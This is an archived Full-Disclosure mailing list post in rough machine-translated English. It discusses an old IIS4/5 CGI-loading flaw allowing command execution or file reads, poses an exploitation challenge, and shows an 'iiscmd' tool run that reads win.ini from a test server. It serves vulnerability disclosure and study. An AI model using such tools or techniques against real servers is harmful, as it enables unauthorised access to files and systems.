[Full-disclosure] Exploit technical challenges






http://hi.baidu.com/yuange1975/blog/item/843aaa97d8f8667f55fb9655.html


Exploit technical challenges

IIS known vulnerability allows an interpretation of any given php file.

Challenge:

How to execute arbitrary commands?

Application Environment: Firewall configuration does not allow outside connections.

Requirements: not required to upload files.





From: yuange1975@xxxxxxxxxxx
To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: iis4\iis5 cgi bug and WEB Service CGI Interface Vulnerability Analysis (continued)
Date: Sat, 11 Dec 2010 06:06:37 +0000




Too many bad things in the belly of the fast. 2000 of iis, unicode \ decode \ cgi \ webdav \ etc vulnerability, reaching a peak, and later transferred to rpc study. Now there is a 01 or so found a serious flaw, iis4, 5 set error loading cgi vulnerability, execute arbitrary commands or view arbitrary files. Spent nearly a decade, this vulnerability have been quickly eaten away. Because iis5.1 core code into the kernel start iis, this exploit code has been dropped, so will not need a later version.
There are loopholes in some time ago to write an article. Did not intend to put out, and feel that soon decayed, it released together.


http://hi.baidu.com/yuange1975/blog/item/6432bffa52252f0fa8d311ac.html

C:\tool>iiscmd -s 192.168.0.112 -f c:\winnt\win.ini
recv:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 11 Dec 2010 05:21:17 GMT
Connection: close
X-Powered-By: PHP/4.0.0
Content-type: text/html

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
ivf=MPEGVideo
m3u=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpv2=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wvx=MPEGVideo

Server close!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Re: [fw-wiz] BGP TCP RST Attacks (was:CIsco PIX vulnerable to TCP RST DOS attacks)
    ... You are right that the ability to exploit this vulnerability ... Randomizing the source port allocated by the system helps a great deal, ... exploitability under most circumstances, but persistent connections are ... For the case of BGP peering, ...
    (Firewall-Wizards)
  • IIS outgoing http vulnerability
    ... related to the security of ServerXMLHttp on an IIS 6 webserver. ... Their current policy is to restrict all outgoing connections and only ... Here is a link to the type of vulnerability: ... "Buffer overruns should be handled by a good firewall. ...
    (microsoft.public.inetserver.iis.security)
  • [Full-Disclosure] Clarification on Xitami DoS
    ... As a result, the vulnerability can ... Unsetting a limit you may have on HTTP connections will not ... systems with limits set will exceed ... handles Keep-Alive connections. ...
    (Full-Disclosure)
  • SECURITY.NNOV: Multiple applications fd_set structure bitmap array index overflow
    ... Vulnerability was discovered for 3proxy during stress-testing and was found ... A call to FD_SET sets a bit to 1 using socket number as an index: ... number of connections by default. ... For Windows fd_set is a sockets array, ...
    (Bugtraq)
  • Clarification on Xitami DoS
    ... As a result, the vulnerability can ... Unsetting a limit you may have on HTTP connections will not ... systems with limits set will exceed ... handles Keep-Alive connections. ...
    (Bugtraq)